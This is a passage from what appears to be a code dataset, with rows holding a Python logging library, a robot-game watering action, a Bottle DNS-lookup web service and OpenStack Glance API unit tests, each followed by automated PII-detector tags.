MPL was not distributed with this file, +# You can obtain one at http://mozilla.org/MPL/2.0/. +# +# Contact: Kyle Lahnakoski (dummy@email.com) +# +from __future__ import absolute_import, division, unicode_literals + +import os +import platform +import sys +from datetime import datetime + +from mo_dots import Data, FlatList, coalesce, is_data, is_list, listwrap, unwraplist, wrap +from mo_future import PY3, is_text, text +from mo_logs import constants, exceptions, strings +from mo_logs.exceptions import Except, LogItem, suppress_exception +from mo_logs.strings import CR, indent + +_Thread = None +if PY3: + STDOUT = sys.stdout.buffer +else: + STDOUT = sys.stdout + + +class Log(object): + """""" + FOR STRUCTURED LOGGING AND EXCEPTION CHAINING + """""" + trace = False + main_log = None + logging_multi = None + profiler = None # simple pypy-friendly profiler + error_mode = False # prevent error loops + + @classmethod + def start(cls, settings=None): + """""" + RUN ME FIRST TO SETUP THE THREADED LOGGING + http://victorlin.me/2012/08/good-logging-practice-in-python/ + + log - LIST OF PARAMETERS FOR LOGGER(S) + trace - SHOW MORE DETAILS IN EVERY LOG LINE (default False) + cprofile - True==ENABLE THE C-PROFILER THAT COMES WITH PYTHON (default False) + USE THE LONG FORM TO SET THE FILENAME {""enabled"": True, ""filename"": ""cprofile.tab""} + profile - True==ENABLE pyLibrary SIMPLE PROFILING (default False) (eg with Profiler(""some description""):) + USE THE LONG FORM TO SET FILENAME {""enabled"": True, ""filename"": ""profile.tab""} + constants - UPDATE MODULE CONSTANTS AT STARTUP (PRIMARILY INTENDED TO CHANGE DEBUG STATE) + """""" + global _Thread + if not settings: + return + settings = wrap(settings) + + Log.stop() + + cls.settings = settings + cls.trace = coalesce(settings.trace, False) + if cls.trace: + from mo_threads import Thread as _Thread + _ = _Thread + + # ENABLE CPROFILE + if settings.cprofile is False: + settings.cprofile = {""enabled"": False} + elif settings.cprofile is True: + if isinstance(settings.cprofile, bool): + settings.cprofile = {""enabled"": True, ""filename"": ""cprofile.tab""} + if settings.cprofile.enabled: + from mo_threads import profiles + profiles.enable_profilers(settings.cprofile.filename) + + if settings.profile is True or (is_data(settings.profile) and settings.profile.enabled): + Log.error(""REMOVED 2018-09-02, Activedata revision 3f30ff46f5971776f8ba18"") + # from mo_logs import profiles + # + # if isinstance(settings.profile, bool): + # profiles.ON = True + # settings.profile = {""enabled"": True, ""filename"": ""profile.tab""} + # + # if settings.profile.enabled: + # profiles.ON = True + + if settings.constants: + constants.set(settings.constants) + + logs = coalesce(settings.log, settings.logs) + if logs: + cls.logging_multi = StructuredLogger_usingMulti() + for log in listwrap(logs): + Log.add_log(Log.new_instance(log)) + + from mo_logs.log_usingThread import StructuredLogger_usingThread + cls.main_log = StructuredLogger_usingThread(cls.logging_multi) + + @classmethod + def stop(cls): + """""" + DECONSTRUCTS ANY LOGGING, AND RETURNS TO DIRECT-TO-stdout LOGGING + EXECUTING MULUTIPLE TIMES IN A ROW IS SAFE, IT HAS NO NET EFFECT, IT STILL LOGS TO stdout + :return: NOTHING + """""" + main_log, cls.main_log = cls.main_log, StructuredLogger_usingStream(STDOUT) + main_log.stop() + + @classmethod + def new_instance(cls, settings): + settings = wrap(settings) + + if settings[""class""]: + if settings[""class""].startswith(""logging.handlers.""): + from mo_logs.log_usingHandler import StructuredLogger_usingHandler + + return StructuredLogger_usingHandler(settings) + else: + with suppress_exception: + from mo_logs.log_usingLogger import make_log_from_settings + + return make_log_from_settings(settings) + # OH WELL :( + + if settings.log_type == ""logger"": + from mo_logs.log_usingLogger import StructuredLogger_usingLogger + return StructuredLogger_usingLogger(settings) + if settings.log_type == ""file"" or settings.file: + return StructuredLogger_usingFile(settings.file) + if settings.log_type == ""file"" or settings.filename: + return StructuredLogger_usingFile(settings.filename) + if settings.log_type == ""console"": + from mo_logs.log_usingThreadedStream import StructuredLogger_usingThreadedStream + return StructuredLogger_usingThreadedStream(STDOUT) + if settings.log_type == ""mozlog"": + from mo_logs.log_usingMozLog import StructuredLogger_usingMozLog + return StructuredLogger_usingMozLog(STDOUT, coalesce(settings.app_name, settings.appname)) + if settings.log_type == ""stream"" or settings.stream: + from mo_logs.log_usingThreadedStream import StructuredLogger_usingThreadedStream + return StructuredLogger_usingThreadedStream(settings.stream) + if settings.log_type == ""elasticsearch"" or settings.stream: + from mo_logs.log_usingElasticSearch import StructuredLogger_usingElasticSearch + return StructuredLogger_usingElasticSearch(settings) + if settings.log_type == ""email"": + from mo_logs.log_usingEmail import StructuredLogger_usingEmail + return StructuredLogger_usingEmail(settings) + if settings.log_type == ""ses"": + from mo_logs.log_usingSES import StructuredLogger_usingSES + return StructuredLogger_usingSES(settings) + if settings.log_type.lower() in [""nothing"", ""none"", ""null""]: + from mo_logs.log_usingNothing import StructuredLogger + return StructuredLogger() + + Log.error(""Log type of {{log_type|quote}} is not recognized"", log_type=settings.log_type) + + @classmethod + def add_log(cls, log): + cls.logging_multi.add_log(log) + + @classmethod + def note( + cls, + template, + default_params={}, + stack_depth=0, + log_context=None, + **more_params + ): + """""" + :param template: *string* human readable string with placeholders for parameters + :param default_params: *dict* parameters to fill in template + :param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller + :param log_context: *dict* extra key:value pairs for your convenience + :param more_params: *any more parameters (which will overwrite default_params) + :return: + """""" + timestamp = datetime.utcnow() + if not is_text(template): + Log.error(""Log.note was expecting a unicode template"") + + Log._annotate( + LogItem( + context=exceptions.NOTE, + format=template, + template=template, + params=dict(default_params, **more_params) + ), + timestamp, + stack_depth+1 + ) + + @classmethod + def unexpected( + cls, + template, + default_params={}, + cause=None, + stack_depth=0, + log_context=None, + **more_params + ): + """""" + :param template: *string* human readable string with placeholders for parameters + :param default_params: *dict* parameters to fill in template + :param cause: *Exception* for chaining + :param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller + :param log_context: *dict* extra key:value pairs for your convenience + :param more_params: *any more parameters (which will overwrite default_params) + :return: + """""" + timestamp = datetime.utcnow() + if not is_text(template): + Log.error(""Log.warning was expecting a unicode template"") + + if isinstance(default_params, BaseException): + cause = default_params + default_params = {} + + if ""values"" in more_params.keys(): + Log.error(""Can not handle a logging parameter by name `values`"") + + params = Data(dict(default_params, **more_params)) + cause = unwraplist([Except.wrap(c) for c in listwrap(cause)]) + trace = exceptions.get_stacktrace(stack_depth + 1) + + e = Except(exceptions.UNEXPECTED, template=template, params=params, cause=cause, trace=trace) + Log._annotate( + e, + timestamp, + stack_depth+1 + ) + + @classmethod + def alarm( + cls, + template, + default_params={}, + stack_depth=0, + log_context=None, + **more_params + ): + """""" + :param template: *string* human readable string with placeholders for parameters + :param default_params: *dict* parameters to fill in template + :param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller + :param log_context: *dict* extra key:value pairs for your convenience + :param more_params: more parameters (which will overwrite default_params) + :return: + """""" + timestamp = datetime.utcnow() + format = (""*"" * 80) + CR + indent(template, prefix=""** "").strip() + CR + (""*"" * 80) + Log._annotate( + LogItem( + context=exceptions.ALARM, + format=format, + template=template, + params=dict(default_params, **more_params) + ), + timestamp, + stack_depth + 1 + ) + + alert = alarm + + @classmethod + def warning( + cls, + template, + default_params={}, + cause=None, + stack_depth=0, + log_context=None, + **more_params + ): + """""" + :param template: *string* human readable string with placeholders for parameters + :param default_params: *dict* parameters to fill in template + :param cause: *Exception* for chaining + :param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller + :param log_context: *dict* extra key:value pairs for your convenience + :param more_params: *any more parameters (which will overwrite default_params) + :return: + """""" + timestamp = datetime.utcnow() + if not is_text(template): + Log.error(""Log.warning was expecting a unicode template"") + + if isinstance(default_params, BaseException): + cause = default_params + default_params = {} + + if ""values"" in more_params.keys(): + Log.error(""Can not handle a logging parameter by name `values`"") + + params = Data(dict(default_params, **more_params)) + cause = unwraplist([Except.wrap(c) for c in listwrap(cause)]) + trace = exceptions.get_stacktrace(stack_depth + 1) + + e = Except(exceptions.WARNING, template=template, params=params, cause=cause, trace=trace) + Log._annotate( + e, + timestamp, + stack_depth+1 + ) + + @classmethod + def error( + cls, + template, # human readable template + default_params={}, # parameters for template + cause=None, # pausible cause + stack_depth=0, + **more_params + ): + """""" + raise an exception with a trace for the cause too + + :param template: *string* human readable string with placeholders for parameters + :param default_params: *dict* parameters to fill in template + :param cause: *Exception* for chaining + :param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller + :param log_context: *dict* extra key:value pairs for your convenience + :param more_params: *any more parameters (which will overwrite default_params) + :return: + """""" + if not is_text(template): + sys.stderr.write(str(""Log.error was expecting a unicode template"")) + Log.error(""Log.error was expecting a unicode template"") + + if default_params and isinstance(listwrap(default_params)[0], BaseException): + cause = default_params + default_params = {} + + params = Data(dict(default_params, **more_params)) + + add_to_trace = False + if cause == None: + causes = None + elif is_list(cause): + causes = [] + for c in listwrap(cause): # CAN NOT USE LIST-COMPREHENSION IN PYTHON3 (EXTRA STACK DEPTH FROM THE IN-LINED GENERATOR) + causes.append(Except.wrap(c, stack_depth=1)) + causes = FlatList(causes) + elif isinstance(cause, BaseException): + causes = Except.wrap(cause, stack_depth=1) + else: + causes = None + Log.error(""can only accept Exception, or list of exceptions"") + + trace = exceptions.get_stacktrace(stack_depth + 1) + + if add_to_trace: + cause[0].trace.extend(trace[1:]) + + e = Except(context=exceptions.ERROR, template=template, params=params, cause=causes, trace=trace) + raise_from_none(e) + + @classmethod + def _annotate( + cls, + item, + timestamp, + stack_depth + ): + """""" + :param itemt: A LogItemTHE TYPE OF MESSAGE + :param stack_depth: FOR TRACKING WHAT LINE THIS CAME FROM + :return: + """""" + item.timestamp = timestamp + item.machine = machine_metadata + item.template = strings.limit(item.template, 10000) + + item.format = strings.limit(item.format, 10000) + if item.format == None: + format = text(item) + else: + format = item.format.replace(""{{"", ""{{params."") + if not format.startswith(CR) and format.find(CR) > -1: + format = CR + format + + if cls.trace: + log_format = item.format = ""{{machine.name}} (pid {{machine.pid}}) - {{timestamp|datetime}} - {{thread.name}} - \""{{location.file}}:{{location.line}}\"" - ({{location.method}}) - "" + format + f = sys._getframe(stack_depth + 1) + item.location = { + ""line"": f.f_lineno, + ""file"": text(f.f_code.co_filename), + ""method"": text(f.f_code.co_name) + } + thread = _Thread.current() + item.thread = {""name"": thread.name, ""id"": thread.id} + else: + log_format = item.format = ""{{timestamp|datetime}} - "" + format + + cls.main_log.write(log_format, item.__data__()) + + def write(self): + raise NotImplementedError + + +def _same_frame(frameA, frameB): + return (frameA.line, frameA.file) == (frameB.line, frameB.file) + + +# GET THE MACHINE METADATA +machine_metadata = wrap({ + ""pid"": os.getpid(), + ""python"": text(platform.python_implementation()), + ""os"": text(platform.system() + platform.release()).strip(), + ""name"": text(platform.node()) +}) + + +def raise_from_none(e): + raise e + +if PY3: + exec(""def raise_from_none(e):\n raise e from None\n"", globals(), locals()) + + +from mo_logs.log_usingFile import StructuredLogger_usingFile +from mo_logs.log_usingMulti import StructuredLogger_usingMulti +from mo_logs.log_usingStream import StructuredLogger_usingStream + + +if not Log.main_log: + Log.main_log = StructuredLogger_usingStream(STDOUT) + +",15833,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Kyle Lahnakoski'], ['NRP', 'FlatList'], ['PERSON', 'LogItem'], ['PERSON', 'cprofile - True==ENABLE'], ['DATE_TIME', '2018-09-02'], ['PERSON', 'mo_logs.log_usingThread'], ['LOCATION', 'main_log'], ['NRP', 'mo_logs.log_usingLogger'], ['LOCATION', 'OH'], ['PERSON', 'LogItem'], ['PERSON', 'LogItem'], ['NRP', 'Log.error(""can'], ['PERSON', 'format.find(CR'], ['PERSON', 'same_frame(frameA'], ['URL', 'http://mozilla.org/MPL/2.0/.'], ['URL', 'http://victorlin.me/2012/08/good-logging-practice-in-python/'], ['URL', 'email.com'], ['URL', 'logs.st'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'Log.st'], ['URL', 'cls.se'], ['URL', 'cls.tr'], ['URL', 'settings.tr'], ['URL', 'cls.tr'], ['URL', 'settings.cprofile.fi'], ['URL', 'settings.pro'], ['URL', 'settings.pro'], ['URL', 'settings.pro'], ['URL', 'Log.er'], ['URL', 'settings.pro'], ['URL', 'settings.pro'], ['URL', 'settings.pro'], ['URL', 'settings.co'], ['URL', 'constants.se'], ['URL', 'settings.co'], ['URL', 'Log.ad'], ['URL', 'Log.ne'], ['URL', 'cls.ma'], ['URL', 'cls.ma'], ['URL', 'cls.ma'], ['URL', 'log.st'], ['URL', 'settings.fi'], ['URL', 'settings.fi'], ['URL', 'settings.fi'], ['URL', 'settings.fi'], ['URL', 'settings.st'], ['URL', 'settings.st'], ['URL', 'settings.st'], ['URL', 'Log.er'], ['URL', 'multi.ad'], ['URL', 'Log.er'], ['URL', 'Log.no'], ['URL', 'exceptions.NO'], ['URL', 'Log.er'], ['URL', 'params.ke'], ['URL', 'Log.er'], ['URL', 'exceptions.ge'], ['URL', 'exceptions.AL'], ['URL', 'Log.er'], ['URL', 'params.ke'], ['URL', 'Log.er'], ['URL', 'exceptions.ge'], ['URL', 'sys.st'], ['URL', 'Log.er'], ['URL', 'Log.er'], ['URL', 'Log.er'], ['URL', 'Log.er'], ['URL', 'exceptions.ge'], ['URL', 'exceptions.ER'], ['URL', 'item.ma'], ['URL', 'strings.li'], ['URL', 'item.fo'], ['URL', 'strings.li'], ['URL', 'item.fo'], ['URL', 'item.fo'], ['URL', 'item.format.re'], ['URL', 'format.st'], ['URL', 'format.fi'], ['URL', 'cls.tr'], ['URL', 'item.fo'], ['URL', 'machine.na'], ['URL', 'thread.na'], ['URL', 'location.fi'], ['URL', 'location.li'], ['URL', 'location.me'], ['URL', 'code.co'], ['URL', 'code.co'], ['URL', 'Thread.cu'], ['URL', 'item.th'], ['URL', 'thread.na'], ['URL', 'thread.id'], ['URL', 'item.fo'], ['URL', 'cls.ma'], ['URL', 'frameA.li'], ['URL', 'frameA.fi'], ['URL', 'frameB.li'], ['URL', 'frameB.fi'], ['URL', 'os.ge'], ['URL', 'platform.py'], ['URL', 'platform.sy'], ['URL', 'platform.re'], ['URL', 'platform.no'], ['URL', 'Log.ma'], ['URL', 'Log.ma']]" +21,"# This file is part of Beneath a Binary Sky. +# Copyright (C) 2016, Aidin Gharibnavaz dummy@email.com +# +# Beneath a Binary Sky is free software: you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation, either version 3 of the +# License, or (at your option) any later version. +# +# Beneath a Binary Sky is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with Beneath a Binary Sky. If not, see +# . + +import time + +from actions.action import Action +from actions.exceptions import InvalidArgumentsError, RobotHaveNoWaterError +from world.world import World +from database.exceptions import LockAlreadyAquiredError + + +class WaterAction(Action): + + def __init__(self): + super().__init__() + + self._world = World() + + def do_action(self, robot, args): + '''Waters the square robot stands on. + + @param robot: Instance of `objects.robot.Robot'. + ''' + if len(args) != 1: + raise InvalidArgumentsError(""`water' action takes no arguments."") + + if not robot.get_has_water(): + raise RobotHaveNoWaterError(""Robot does not carry water."") + + try: + square = self._world.get_square(robot.get_location(), for_update=True) + except LockAlreadyAquiredError: + # Waiting a little, and trying one more time. + time.sleep(0.02) + square = self._world.get_square(robot.get_location(), for_update=True) + + # Note: we don't raise an exception if there's no plant. A robot can waste its water. + plant = square.get_plant() + if plant is not None: + plant.set_water_level(100) + robot.set_honor(robot.get_honor() + 1) + + robot.set_has_water(False) +",2047,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2016'], ['PERSON', 'Aidin Gharibnavaz'], ['DATE_TIME', 'RobotHaveNoWaterError(""Robot'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'actions.ac'], ['URL', 'objects.robot.Ro'], ['URL', 'robot.ge'], ['URL', 'world.ge'], ['URL', 'robot.ge'], ['URL', 'time.sl'], ['URL', 'world.ge'], ['URL', 'robot.ge'], ['URL', 'square.ge'], ['URL', 'plant.se'], ['URL', 'robot.se'], ['URL', 'robot.ge'], ['URL', 'robot.se']]" +22,"#!/usr/bin/env python3 + +import os, logging, argparse, json, datetime +import requests +import dns.resolver +from bottle import route, request, response, redirect, hook, error, default_app, view, static_file, template + +def set_content_type(fn): + def _return_type(*args, **kwargs): + if request.headers.get('Accept') == ""application/json"": + response.headers['Content-Type'] = 'application/json' + if request.headers.get('Accept') == ""text/plain"": + response.headers['Content-Type'] = 'text/plain' + if request.method != 'OPTIONS': + return fn(*args, **kwargs) + return _return_type + +def enable_cors(fn): + def _enable_cors(*args, **kwargs): + response.headers['Access-Control-Allow-Origin'] = '*' + response.headers['Access-Control-Allow-Methods'] = 'GET, POST, PUT, OPTIONS' + response.headers['Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token' + + if request.method != 'OPTIONS': + return fn(*args, **kwargs) + return _enable_cors + +def resolveDomain(domain, recordType, args): + records = [] + + if args.doh: + try: + payload = { + 'name': domain, + 'type': recordType + } + data = requests.get(""{}"".format(args.resolver), params=payload) + for rec in data.json()['Answer']: + records.append(rec['data']) + except: + return records + return records + else: + try: + resolver = dns.resolver.Resolver() + resolver.nameservers = args.resolver.split(',') + + if recordType in args.records.split(','): + lookup = resolver.resolve(domain, recordType) + for data in lookup: + if recordType in ['A', 'AAAA']: + records.append(data.address) + elif recordType in ['TXT']: + for rec in data.strings: + records.append(rec.decode(""utf-8"").replace('""', '').strip()) + else: + records.append(str(data).replace('""', '').strip()) + return records + except dns.resolver.NXDOMAIN: + return records + except dns.resolver.NoAnswer: + return records + except dns.exception.Timeout: + return records + except dns.resolver.NoNameservers: + return records + +@error('404') +@error('403') +def returnError(code, msg, contentType=""text/plain""): + response.status = int(code) + response.content_type = contentType + return template('error') + +@route('/static/') +def static(filepath): + return static_file(filepath, root='views/static') + +@route('/servers') +def servers(): + try: + response.content_type = 'text/plain' + return ""\r\n"".join(args.resolver.split("","")) + except: + return ""Unable to open servers file."" + +@route('/version') +def version(): + try: + dirname, filename = os.path.split(os.path.abspath(__file__)) + del filename + f = open(os.getenv('VERSION_PATH', dirname + '/.git/refs/heads/master'), 'r') + content = f.read() + response.content_type = 'text/plain' + return content + except: + return ""Unable to open version file."" + +@route('/') +def route_redirect(record): + return redirect(""/{}/A"".format(record)) + +@route('//') +@route('//.') +@set_content_type +@enable_cors +def loadRecord(record, type='A', ext='html'): + try: + if record == """": + raise ValueError + if not ext in [""html"",""txt"", ""text"", ""json""]: + raise ValueError + if not type.upper() in args.records.split(','): + raise ValueError + except ValueError: + return returnError(404, ""Not Found"", ""text/html"") + + if ext in [""json""]: + response.content_type = 'application/json' + if ext in [""txt"", ""text""]: + response.content_type = 'text/plain' + + # We make a request to get information + data = resolveDomain(record, type.upper(), args) + + if response.content_type == 'application/json': + return json.dumps({ + 'results': { + 'name': record, + 'type': type.upper(), + 'records': data, + } + }) + elif response.content_type == ""text/plain"": + return ""\r\n"".join(data) + else: + return template('rec', { + 'name': record, + 'type': type.upper(), + 'records': data, + 'recTypes': args.records.split(',') + }) + +@route('/', ('GET', 'POST')) +def index(): + + if request.method == ""POST"": + recordName = request.forms.get('recordName', '') + recordType = request.forms.get('recordType', '') + + if recordName != '' and recordType in args.records.split(','): + return redirect(""/{}/{}"".format(recordName, recordType)) + else: + return returnError(404, ""We were not able to figure out what you were asking for"", ""text/html"") + + return template(""home"", { + 'recTypes': args.records.split(',') + }) + +if __name__ == '__main__': + + parser = argparse.ArgumentParser() + + # Server settings + parser.add_argument(""-i"", ""--host"", default=os.getenv('HOST', '127.0.0.1'), help=""server ip"") + parser.add_argument(""-p"", ""--port"", default=os.getenv('PORT', 5000), help=""server port"") + + # Redis settings + parser.add_argument(""--redis"", default=os.getenv('REDIS', 'redis://localhost:6379/0'), help=""redis connection string"") + + # Application settings + parser.add_argument(""--doh"", help=""use DNS-over-HTTPS and treat --resolver as DNS-over-HTTPS capable (beta)"", action=""store_true"") + parser.add_argument(""--records"", default=os.getenv('RECORDS', ""A,AAAA,CAA,CNAME,DS,DNSKEY,MX,NS,NSEC,NSEC3,RRSIG,SOA,TXT""), help=""supported records"") + parser.add_argument(""--resolver"", default=os.getenv('RESOLVER', '127.0.0.1'), help=""resolver address"") + + # Verbose mode + parser.add_argument(""--verbose"", ""-v"", help=""increase output verbosity"", action=""store_true"") + args = parser.parse_args() + + if args.verbose: + logging.basicConfig(level=logging.DEBUG) + else: + logging.basicConfig(level=logging.INFO) + log = logging.getLogger(__name__) + + try: + app = default_app() + app.run(host=args.host, port=args.port, server='tornado') + except: + log.error(""Unable to start server on {}:{}"".format(args.host, args.port))",5656,"[['LOCATION', 'json'], ['LOCATION', 'fn(*args'], ['LOCATION', 'fn(*args'], ['PERSON', 'NoAnswer'], ['PERSON', 'dirname'], ['PERSON', 'dirname'], ['PERSON', ""@route('/""], ['LOCATION', 'DNSKEY'], ['PERSON', 'help=""resolver'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'dns.re'], ['URL', 'request.headers.ge'], ['URL', 'request.headers.ge'], ['URL', 'request.me'], ['URL', 'request.me'], ['URL', 'args.do'], ['URL', 'requests.ge'], ['URL', 'args.re'], ['URL', 'dns.resolver.Re'], ['URL', 'resolver.na'], ['URL', 'args.re'], ['URL', 'args.re'], ['URL', 'resolver.re'], ['URL', 'data.ad'], ['URL', 'data.st'], ['URL', 'rec.de'], ['URL', 'dns.re'], ['URL', 'dns.resolver.No'], ['URL', 'dns.resolver.No'], ['URL', 'response.st'], ['URL', 'response.co'], ['URL', 'response.co'], ['URL', 'args.re'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'f.re'], ['URL', 'response.co'], ['URL', 'args.re'], ['URL', 'response.co'], ['URL', 'response.co'], ['URL', 'response.co'], ['URL', 'response.co'], ['URL', 'args.re'], ['URL', 'request.me'], ['URL', 'request.forms.ge'], ['URL', 'request.forms.ge'], ['URL', 'args.re'], ['URL', 'args.re'], ['URL', 'argparse.Ar'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'os.ge'], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['URL', 'args.ve'], ['URL', 'logging.ba'], ['URL', 'logging.DE'], ['URL', 'logging.ba'], ['URL', 'logging.IN'], ['URL', 'logging.ge'], ['URL', 'app.ru'], ['URL', 'log.er']]" +23,"# vim: tabstop=4 shiftwidth=4 softtabstop=4 +# -*- coding: utf-8 -*- + +# Copyright 2010-2011 OpenStack, LLC +# All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the ""License""); you may +# not use this file except in compliance with the License. You may obtain +# a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an ""AS IS"" BASIS, WITHOUT +# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the +# License for the specific language governing permissions and limitations +# under the License. + +import copy +import datetime +import hashlib +import json +import StringIO + +from oslo.config import cfg +import routes +import six +import webob + +import glance.api +import glance.api.common +from glance.api.v1 import filters +from glance.api.v1 import images +from glance.api.v1 import router +from glance.common import exception +import glance.common.config +import glance.context +from glance.db.sqlalchemy import api as db_api +from glance.db.sqlalchemy import models as db_models +from glance.openstack.common import timeutils +from glance.openstack.common import uuidutils +import glance.store.filesystem +from glance.tests.unit import base +from glance.tests import utils as test_utils +import glance.tests.unit.utils as unit_test_utils + +CONF = cfg.CONF + +_gen_uuid = uuidutils.generate_uuid + +UUID1 = _gen_uuid() +UUID2 = _gen_uuid() + + +class TestGlanceAPI(base.IsolatedUnitTest): + def setUp(self): + """"""Establish a clean test environment"""""" + super(TestGlanceAPI, self).setUp() + self.mapper = routes.Mapper() + self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper)) + self.FIXTURES = [ + {'id': UUID1, + 'name': 'fake image #1', + 'status': 'active', + 'disk_format': 'ami', + 'container_format': 'ami', + 'is_public': False, + 'created_at': timeutils.utcnow(), + 'updated_at': timeutils.utcnow(), + 'deleted_at': None, + 'deleted': False, + 'checksum': None, + 'size': 13, + 'locations': [{'url': ""file:///%s/%s"" % (self.test_dir, UUID1), + 'metadata': {}}], + 'properties': {'type': 'kernel'}}, + {'id': UUID2, + 'name': 'fake image #2', + 'status': 'active', + 'disk_format': 'vhd', + 'container_format': 'ovf', + 'is_public': True, + 'created_at': timeutils.utcnow(), + 'updated_at': timeutils.utcnow(), + 'deleted_at': None, + 'deleted': False, + 'checksum': 'abc123', + 'size': 19, + 'locations': [{'url': ""file:///%s/%s"" % (self.test_dir, UUID2), + 'metadata': {}}], + 'properties': {}}] + self.context = glance.context.RequestContext(is_admin=True) + db_api.setup_db_env() + db_api.get_engine() + self.destroy_fixtures() + self.create_fixtures() + + def tearDown(self): + """"""Clear the test environment"""""" + super(TestGlanceAPI, self).tearDown() + self.destroy_fixtures() + + def create_fixtures(self): + for fixture in self.FIXTURES: + db_api.image_create(self.context, fixture) + # We write a fake image file to the filesystem + with open(""%s/%s"" % (self.test_dir, fixture['id']), 'wb') as image: + image.write(""chunk00000remainder"") + image.flush() + + def destroy_fixtures(self): + # Easiest to just drop the models and re-create them... + db_models.unregister_models(db_api._ENGINE) + db_models.register_models(db_api._ENGINE) + + def _do_test_defaulted_format(self, format_key, format_value): + fixture_headers = {'x-image-meta-name': 'defaulted', + 'x-image-meta-location': 'http://localhost:0/image', + format_key: format_value} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + res_body = json.loads(res.body)['image'] + self.assertEquals(format_value, res_body['disk_format']) + self.assertEquals(format_value, res_body['container_format']) + + def test_defaulted_amazon_format(self): + for key in ('x-image-meta-disk-format', + 'x-image-meta-container-format'): + for value in ('aki', 'ari', 'ami'): + self._do_test_defaulted_format(key, value) + + def test_bad_disk_format(self): + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'bogus', + 'x-image-meta-location': 'http://localhost:0/image.tar.gz', + 'x-image-meta-disk-format': 'invalid', + 'x-image-meta-container-format': 'ami', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + self.assertTrue('Invalid disk format' in res.body, res.body) + + def test_configured_disk_format_good(self): + self.config(disk_formats=['foo']) + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'bogus', + 'x-image-meta-location': 'http://localhost:0/image.tar.gz', + 'x-image-meta-disk-format': 'foo', + 'x-image-meta-container-format': 'bare', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + def test_configured_disk_format_bad(self): + self.config(disk_formats=['foo']) + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'bogus', + 'x-image-meta-location': 'http://localhost:0/image.tar.gz', + 'x-image-meta-disk-format': 'bar', + 'x-image-meta-container-format': 'bare', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + self.assertTrue('Invalid disk format' in res.body, res.body) + + def test_configured_container_format_good(self): + self.config(container_formats=['foo']) + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'bogus', + 'x-image-meta-location': 'http://localhost:0/image.tar.gz', + 'x-image-meta-disk-format': 'raw', + 'x-image-meta-container-format': 'foo', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + def test_configured_container_format_bad(self): + self.config(container_formats=['foo']) + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'bogus', + 'x-image-meta-location': 'http://localhost:0/image.tar.gz', + 'x-image-meta-disk-format': 'raw', + 'x-image-meta-container-format': 'bar', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + self.assertTrue('Invalid container format' in res.body, res.body) + + def test_container_and_disk_amazon_format_differs(self): + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'bogus', + 'x-image-meta-location': 'http://localhost:0/image.tar.gz', + 'x-image-meta-disk-format': 'aki', + 'x-image-meta-container-format': 'ami'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + expected = (""Invalid mix of disk and container formats. "" + ""When setting a disk or container format to one of "" + ""'aki', 'ari', or 'ami', "" + ""the container and disk formats must match."") + self.assertEquals(res.status_int, 400) + self.assertTrue(expected in res.body, res.body) + + def test_create_with_location_no_container_format(self): + fixture_headers = { + 'x-image-meta-store': 'bad', + 'x-image-meta-name': 'bogus', + 'x-image-meta-location': 'http://localhost:0/image.tar.gz', + 'x-image-meta-disk-format': 'vhd', + } + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + self.assertTrue('Invalid 